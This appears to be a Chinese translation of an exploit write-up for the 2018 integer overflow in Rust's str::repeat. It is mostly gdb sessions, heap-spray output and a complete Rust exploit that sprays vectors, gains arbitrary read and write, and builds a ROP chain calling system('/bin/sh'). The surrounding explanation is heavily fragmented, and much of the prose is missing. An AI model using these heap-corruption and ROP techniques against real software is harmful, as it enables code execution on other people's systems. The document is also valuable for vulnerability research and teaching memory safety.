https://github.com/rust-lang/rust/pull/54397
https://github.com/saaramar/execve_exploit
https://blog.rust-lang.org/2018/09/21/Security-advisory-for-std.html https://github.com/rust-lang/rust/pull/54398/files
- fn main() { let _s = "AAAA".repeat(0x4000000000000001); }
可以控制imul指令的2个操作数!现在运行程序:
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cat src/main.rs
- fn main() {
- let _s = "AAAA".repeat(0xc000000000000001);
- }
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ rustc --version
- rustc 1.29.0 (aa3ca1994 2018-09-11)
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
- Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
- Finished dev [unoptimized + debuginfo] target(s) in 2.92s
- Running `target/debug/exploit`
- Segmentation fault (core dumped)
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
遇到了段错误!在Rust中这种问题很奇怪,当运行时安全检查检测到问题并导致程序中止时,就会发生这种情况。这是它崩溃的原因:
- (gdb) start
- Temporary breakpoint 1 at 0x6072: file src/main.rs, line 2.
- Starting program: /mnt/c/projects/rust/exploit/target/debug/exploit
- [Thread debugging using libthread_db enabled]
- Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
- Temporary breakpoint 1, exploit::main () at src/main.rs:2
- 2 let _s = "AAAA".repeat(0xc000000000000001);
- (gdb) c
- Continuing.
- Program received signal SIGSEGV, Segmentation fault.
- __memmove_avx_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:249
- 249 ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.
- (gdb) x/8i $rip
- => 0x7ffffe92eb1f : rep movsb %ds:(%rsi),%es:(%rdi)
- 0x7ffffe92eb21 : retq
- 0x7ffffe92eb22 : cmp $0x10,%dl
- 0x7ffffe92eb25 : jae 0x7ffffe92eb3e 0x7ffffe92eb27 : cmp $0x8,%dl
- 0x7ffffe92eb2a : jae 0x7ffffe92eb53 0x7ffffe92eb2c : cmp $0x4,%dl
- 0x7ffffe92eb2f : jae 0x7ffffe92eb64 (gdb) x/8gx $rsi
- 0x7ffffe400000: 0x4141414141414141 0x4141414141414141
- 0x7ffffe400010: 0x4141414141414141 0x4141414141414141
- 0x7ffffe400020: 0x4141414141414141 0x4141414141414141
- 0x7ffffe400030: 0x4141414141414141 0x4141414141414141
- (gdb) x/8gx $rdi
- 0x7ffffe600000: Cannot access memory at address 0x7ffffe600000
- (gdb)
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
- Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
- error: this form of character escape may only be used with characters in the range [\x00-\x7f]
- --> src/main.rs:2:21
- |
- 2 | let _s = "\x7f\xff\xff\xff".repeat(0xc000000000000001);
- | ^^
- error: aborting due to previous error
- error: Could not compile `exploit`.
- To learn more, run the command again with --verbose.
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$
- length_of_string * repeat_arg
例如,如果我希望块的大小为0x100,则可以使用以下代码:
- "AAAA".repeat(0x4000000000000000+0x100/4);
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
- Finished dev [unoptimized + debuginfo] target(s) in 0.01s
- Running `target/debug/exploit`
- thread 0x1: allocate chunk @ 0x7f7a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7939200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7839200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7739200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7639200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7539200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7439200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7339200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7239200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7139200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f7039200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6f39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6e39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6d39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6c39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6b39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6939200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6839200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6739200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6639200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6539200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6439200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6339200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6239200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6139200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f6039200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5f39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5e39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5d39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5c39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5b39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5939200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5839200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5739200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5639200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5539200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5439200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5339200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5239200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5139200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f5039200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4f39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4e39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4d39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4c39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4b39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4939200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4839200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4739200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4639200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4539200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4439200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4339200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4239200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4139200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f4039200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3f39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3e39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3d39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3c39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3b39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3939200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3839200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3739200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3639200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3539200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3439200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3339200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3239200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3139200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f3039200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2f39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2e39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2d39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2c39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2b39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2a39200000, size 0x100000000
- thread 0x1: allocate chunk @ 0x7f2939200000, size 0x100000000
- pub fn insert(&mut self, index: usize, element: T) {
- let len = self.len();
- assert!(index <= len);
- // space for the new element
- if len == self.buf.capacity() {
- self.reserve(1);
- }
- unsafe {
- // infallible
- // The spot to put the new value
- {
- let p = self.as_mut_ptr().add(index);
- // Shift everything over to make space. (Duplicating the
- // `index`th element into two consecutive places.)
- ptr::copy(p, p.offset(1), len - index);
- // Write it in, overwriting the first copy of the `index`th
- // element.
- ptr::write(p, element);
- }
- self.set_len(len + 1);
- }
- }
- let mut corrupted_vec = 0;
- println!("[*scan*]\tstart checking vectors");
- for i in 0..count {
- if allocs[i][0].len() > 1 {
- println!("[*scan*]\tvec corrupted! allocs[{}][0].len() == {:#x}", i, allocs[i][0].len());
- corrupted_vec = i;
- break;
- }
- }
并且,如果仅触发字符串“ AAAA”上的通配符,并且尝试将所需的任何值(例如0x9090909090909090)写入损坏的vector,则可以肯定地得到:
- Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
- [Switching to Thread 0x7f4a7cdf0700 (LWP 8807)]
- 0x00007f4a7e408d19 in exploit::do_arbitrary_write (allocs=0x7f4a7cdef680, count=10000, target_vec=1725, second_target_vec=6299648, addr=139640115757568, value=29400045130965551)
- at src/main.rs:21
- 21 allocs[i][0][0] = 0x9090909090909090;
- (gdb) x/2i $rip
- => 0x7f4a7e408d19 : mov %rax,(%rcx)
- 0x7f4a7e408d1c : jmpq 0x7f4a7e408c50 (gdb) i r rcx
- rcx 0x4141414141414141 4702111234474983745
- (gdb) i r rax
- rax 0x9090909090909090 -8029759185026510704
- (gdb)
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, 0x434343434343434343, 0x4848484848484848);
看到它将导致以下结果:
- Thread 2 "exploit" received signal SIGSEGV, Segmentation fault.
- [Switching to Thread 0x7fa070ff0700 (LWP 24521)]
- 0x00007fa07280ae32 in exploit::do_arbitrary_write (allocs=0x7fa070fef658,
- corrupted_vec=9997, target_vec=23076864, target_idx=3148, addr=4846791580151137091,
- value=5208492444341520456) at src/main.rs:68
- 68 allocs[target_idx][0][0] = value;
- (gdb) x/2i $rip
- => 0x7fa07280ae32 : mov %rcx,(%rax)
- 0x7fa07280ae35 : add $0x78,%rsp
- (gdb) i r rax
- rax 0x4343434343434343 4846791580151137091
- (gdb) i r rcx
- rcx 0x4848484848484848 5208492444341520456
- (gdb)
- fn get_stack_addr() -> u64 {
- let local_var = String::new();
- let stack_addr = &format!("{:p}", &local_var)[2..];
- return u64::from_str_radix(&stack_addr, 0x10).unwrap();
- }
要查找Gadget的地址,我可以使用已经拥有的读取原语在main()周围的.text部分中查找字节序列。现在,此ROP链所需的唯一符号是dlsym。可以通过解析ELF标头轻松解决此问题,但是这会使我的代码混乱,并且对于POC而言不必要。因此,只需添加一个extern即可将此符号导入到我的Rust代码中):
- extern {
- fn dlsym(handle: *const u8, symbol: *const u8) -> *const u8;
- }
请注意,这不需要任何不安全的块,只允许我将其强制转换为u64,如下所示:
- let dlsym_addr = dlsym as u64;
- println!("[*corrupt*]\tstack addr @ {:#x}, ret_addr @ {:#x}", stack_addr, ret_addr);
- // set up the strings I need
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, BIN_SH_STR, 0x0068732f6e69622f);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973);
- // build the ROP on the stack
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*0, main_addr + pop_rdi_ret_off + 1); // make stack aligned for movaps
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*1, main_addr + pop_rdi_ret_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*2, 0); // handle = NULL;
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*3, main_addr + pop_rsi_ret_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*4, SYSTEM);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*5, dlsym_addr);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*6, main_addr + pop_rdi_jmp_rax_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*7, BIN_SH_STR);
- https://twitter.com/tom41sh
- amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
- Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
- Finished dev [unoptimized + debuginfo] target(s) in 3.75s
- Running `target/debug/exploit`
- [*start*] Let the fun begin!
- [*shape*] shape: spraying vectors
- [*shape*] shape: done spraying vectors
- [*vuln*] trigger_vulnerability
- [*scan*] start checking vectors
- [*scan*] vec corrupted! allocs[9997][0].len() == 0x90d790d790d790d7
- [*scan*] done checking vectors
- https://github.com/saaramar/str_repeat_exploit/raw/master/src
- use std::{thread, time};
- use std::sync::mpsc::channel;
- extern {
- fn dlsym(handle: *const u8, symbol: *const u8) -> *const u8;
- }
- static ERROR_VALUE : u64 = 0xffffffffffffffff;
- static VECTOR_SIZE : usize = 0x600000;
- static VECTOR_SPRAY_CNT : usize = 10000;
- static BIN_SH_STR : u64 = 0x7f007f7f0000 + 0x200;
- static SYSTEM : u64 = 0x7f007f7f0000 + 0x220;
- static POP_RDI_JMP_RAX : u64 = 0xe0ff5f;
- static POP_RDI_RET : u64 = 0xc35f;
- static POP_RSI_RET : u64 = 0xc35e;
- fn get_stack_addr() -> u64 {
- let local_var = String::new();
- let stack_addr = &format!("{:p}", &local_var)[2..];
- return u64::from_str_radix(&stack_addr, 0x10).unwrap();
- }
- fn scan_for_value(allocs : &mut Vec, corrupted_vec : usize,
- target_vec : usize, target_idx : usize,
- addr : u64, bytes : u64, mask : u64) -> u64 {
- for i in 0..0x1000000 {
- let mut val = do_relative_read(allocs, corrupted_vec, target_vec, target_idx, addr, i);
- for j in 0..8 {
- val = val >> (8 * (j as u64));
- if (val & mask) == bytes {
- return (i*8 + j) as u64;
- }
- }
- }
- return ERROR_VALUE;
- }
- fn scan_for_qword(allocs : &mut Vec, corrupted_vec : usize,
- target_vec : usize, target_idx : usize,
- addr : u64, qword : u64) -> u64 {
- for i in 0..0x1000000 {
- let mut val = do_relative_read(allocs, corrupted_vec, target_vec, target_idx, addr, i);
- if (val & 0xffffffffffff0000) == ( qword & 0xffffffffffff0000) {
- if val > qword {
- return (i*8) as u64;
- }
- }
- }
- return ERROR_VALUE;
- }
- fn do_relative_read(allocs : &mut Vec, corrupted_vec : usize,
- target_vec : usize, target_idx : usize,
- addr : u64, offset : usize) -> u64 {
- allocs[corrupted_vec][0][target_vec] = addr;
- return allocs[target_idx][0][offset];
- }
- fn do_arbitrary_write(allocs : &mut Vec, corrupted_vec : usize,
- target_vec : usize, target_idx : usize,
- addr : u64, value : u64) {
- allocs[corrupted_vec][0][target_vec] = addr;
- allocs[target_idx][0][0] = value;
- }
- fn corrupt_with_rop(allocs : &mut Vec, corrupted_vec : usize,
- target_vec : usize,
- target_idx : usize) {
- let stack_addr = get_stack_addr();
- let main_addr = main as u64;
- let dlsym_addr = dlsym as u64;
- println!("[*corrupt*]\tresolve gadgets");
- let pop_rdi_ret_off = scan_for_value(allocs, corrupted_vec, target_vec, target_idx, main_addr, POP_RDI_RET, 0xffff) + 1;
- let pop_rsi_ret_off = scan_for_value(allocs, corrupted_vec, target_vec, target_idx, main_addr, POP_RSI_RET, 0xffff);
- let pop_rdi_jmp_rax_off = scan_for_value(allocs, corrupted_vec, target_vec, target_idx, main_addr, POP_RDI_JMP_RAX, 0xffffff);
- let ret_addr_off = scan_for_qword(allocs, corrupted_vec, target_vec, target_idx, stack_addr+0x450, exploit_thread as u64);
- let ret_addr = stack_addr + 0x450 + ret_addr_off;
- if pop_rdi_ret_off == ERROR_VALUE || pop_rsi_ret_off == ERROR_VALUE || pop_rdi_jmp_rax_off == ERROR_VALUE {
- println!("[*corrupt*] failed to resolve gadgets, abort");
- return;
- }
- println!("[*corrupt*]\tstack addr @ {:#x}, ret_addr @ {:#x}", stack_addr, ret_addr);
- // set up the strings I need
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, BIN_SH_STR, 0x0068732f6e69622f);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973);
- // build the ROP on the stack
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*0, main_addr + pop_rdi_ret_off + 1); // make stack aligned for movaps
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*1, main_addr + pop_rdi_ret_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*2, 0); // handle = NULL;
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*3, main_addr + pop_rsi_ret_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*4, SYSTEM);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*5, dlsym_addr);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*6, main_addr + pop_rdi_jmp_rax_off);
- do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*7, BIN_SH_STR);
- println!("[*corrupt*]\ttrigger retq");
- }
- fn spray_vectors(size : usize, count: usize) -> Vec {
- let mut allocs = Vec::new();
- for _i in 0..count {
- let mut vec : Vec = Vec::with_capacity(size);
- let mut subvec : Vec = Vec::with_capacity(size);
- subvec.push(0x43434343);
- vec.push(subvec);
- allocs.push(vec);
- }
- return allocs;
- }
- /*
- terminology:
- corrupted_vec: the first vector I find that was corrupted with the wildcopy
- target_vec: the vector I find while relative read scan the memory, and corrupt it for arbitrary use
- target_idx: the actual index of the target_vec, so I can do allocs[idx][0][0] for arbitrary RW
- */
- fn exploit_thread(size : usize, count: usize, tx : std::sync::mpsc::Sender) {
- println!("[*shape*]\tshape: spraying vectors");
- let mut allocs = spray_vectors(size, count);
- println!("[*shape*]\tshape: done spraying vectors");
- tx.send(()).unwrap();
- thread::sleep(time::Duration::from_millis(1000));
- let mut corrupted_vec = 0;
- println!("[*scan*]\tstart checking vectors");
- for i in 0..count {
- if allocs[i][0].len() > 1 {
- println!("[*scan*]\tvec corrupted! allocs[{}][0].len() == {:#x}", i, allocs[i][0].len());
- corrupted_vec = i;
- break;
- }
- }
- if corrupted_vec == 0 {
- println!("[*scan*]\tfailed to find target vec, abort");
- return;
- }
- println!("[*scan*]\tdone checking vectors");
- // find target vector
- let mut target_vec : usize = 0x0;
- println!("[*scan*]\tstart scan for interesting data");
- for i in 0..0x100000000 {
- if allocs[corrupted_vec][0][i] != 0 {
- let val = allocs[corrupted_vec][0][i];
- println!("[*scan*]\tfound interesting data at offset {}*8 == {:#x}", i, val);
- if val > 0x7f0000000000 {
- target_vec = i;
- println!("[*scan*]\tfound vector buf pointer at {} == {:#x}", target_vec, val);
- // mark the second corrupted vector, so I can find it easily for later use
- allocs[corrupted_vec][0][i+2] = 0x4848484848484848 as u64;
- break;
- }
- }
- }
- let mut target_idx = 0x0;
- for i in 0..count {
- if allocs[i][0].len() == 0x4848484848484848 {
- target_idx = i;
- }
- }
- if target_idx == 0 {
- println!("[*scan*]\tfailed to find second target vec, abort");
- return;
- }
- /*
- when exploit_thread exists, it frees the allocs vector and
- cleanup lots of the pointers and stuctures. We clearly segfualt there,
- so why not simply pass our RW structure into a subfunctio, and execute
- ROP on its return :)
- */
- println!("[*corrupt*]\tcorrupt ret addr with ROP");
- corrupt_with_rop(&mut allocs, corrupted_vec, target_vec, target_idx);
- }
- fn trigger_vulnerability(size : usize) {
- println!("[*vuln*]\ttrigger_vulnerability");
- let fixed_addr = "\x00\x00\x7f\x7f\x00\x7f\x00\x00";
- let _s = fixed_addr.repeat(0x4000000000000000 + size / 8);
- }
- fn main() {
- let (tx, rx) = channel();
- println!("[*start*]\tLet the fun begin!");
- thread::spawn(move || { exploit_thread(VECTOR_SIZE, VECTOR_SPRAY_CNT, tx)});
- rx.recv().unwrap();
- thread::sleep(time::Duration::from_millis(100));
- trigger_vulnerability(VECTOR_SIZE);
- thread::sleep(time::Duration::from_millis(1000 * 60));
- }
本文翻译自:https://saaramar.github.io/str_repeat_exploit/如若转载,请注明原文地址